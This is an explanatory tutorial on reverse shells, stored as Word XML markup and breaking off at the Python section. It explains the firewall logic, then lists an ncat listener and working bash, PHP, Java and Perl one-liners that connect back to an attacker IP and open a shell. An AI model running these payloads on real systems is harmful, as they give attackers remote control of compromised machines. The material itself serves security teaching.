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340094" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="375" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>To gain control over a compromised system, an attacker usually aims to gain interactive shell access for arbitrary command execution. With such access, they can try to elevate their privileges to obtain full control of the operating system. However, most systems are behind firewalls and direct remote shell connections are impossible. One of the methods used to circumvent this limitation is a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5706E98F" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="525" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>How Reverse Shell Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3AEAD7" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="375" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>In a typical remote system access scenario, the user is the client and the target machine is the server. The user initiates a remote shell connection and the target system listens for such connections. With a reverse shell, the roles are opposite. It is the target machine that initiates the connection to the user, and the user’s computer listens for incoming connections on a specified port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5250166B" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="375" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>The primary reason why reverse shells are often used by attackers is the way that most firewalls are configured. Attacked servers usually allow connections only on specific ports. For example, a dedicated web server will only accept connections on ports 80 and 443. This means that there is no possibility to establish a shell listener on the attacked server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6578D851" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="375" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>On the other hand, firewalls usually do not limit outgoing connections at all. Therefore, an attacker may establish a server on their own machine and create a reverse connection. All that the attacker needs is a machine that has a public (routable) IP address and a tool such as netcat to create the listener and bind shell access to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680F8645" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="525" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Reverse Shell Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369F0605" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="375" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>It is very simple to create reverse shells using different tools and languages. First, you need a listener on your local machine with a public IP. For example, on a Linux machine, all you need is the following netcat command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB6B873" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE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lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>ncat -l -p 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CEC3F5" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="375" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>This establishes the listener on TCP port 1337. Let’s assume that the user’s machine is available at the IP address 10.10.17.1. The following one-liners executed on the compromised target machine create a reverse shell connection with the attacker’s machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58405FF9" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Bash Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AEC8B8" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="375" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The simplest method is to use bash which is available on almost all Linux machines. This was tested on Ubuntu 18.04 but not all versions of bash support this function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24571EF3" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE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lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>/bin/bash -i &gt;&amp; /dev/tcp/10.10.17.1/1337 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4B1D87" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>PHP Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B8A84D" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="375" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>If the target machine is a web server and it uses PHP, this language is an excellent choice for a reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181D46CD" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE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lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>php -r '$sock=fsockopen("10.10.17.1",1337);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3631DC1F" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="375" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>If this does not work, you can try replacing &amp;3 with consecutive file descriptors. Another option for PHP is to </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00195AE6">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="E31E25"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>download and execute a more complex script developed by pentestmonkey</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D66D33" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Java Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A281280" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="375" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>If the target machine uses Java, try the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5A6B3A" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE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lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>r = Runtime.getRuntime()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD068C9" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE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lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F50C342" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE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lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>p = r.exec(["/bin/bash","-c","exec 5&lt;&gt;/dev/tcp/10.10.17.1/1337;cat &lt;&amp;5 | while read line; do \$line 2&gt;&amp;5 &gt;&amp;5; done"] as String[]) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485F8575" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE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lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="138FA21D" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE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lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>p.waitFor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084AE664" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Perl Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C75321E" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="375" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Perl is another good candidate for a reverse shell on a web server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77106DAE" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE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lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>perl -e 'use Socket;$i="10.10.17.1";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4CA2AC" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Python Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33098111" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="375" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
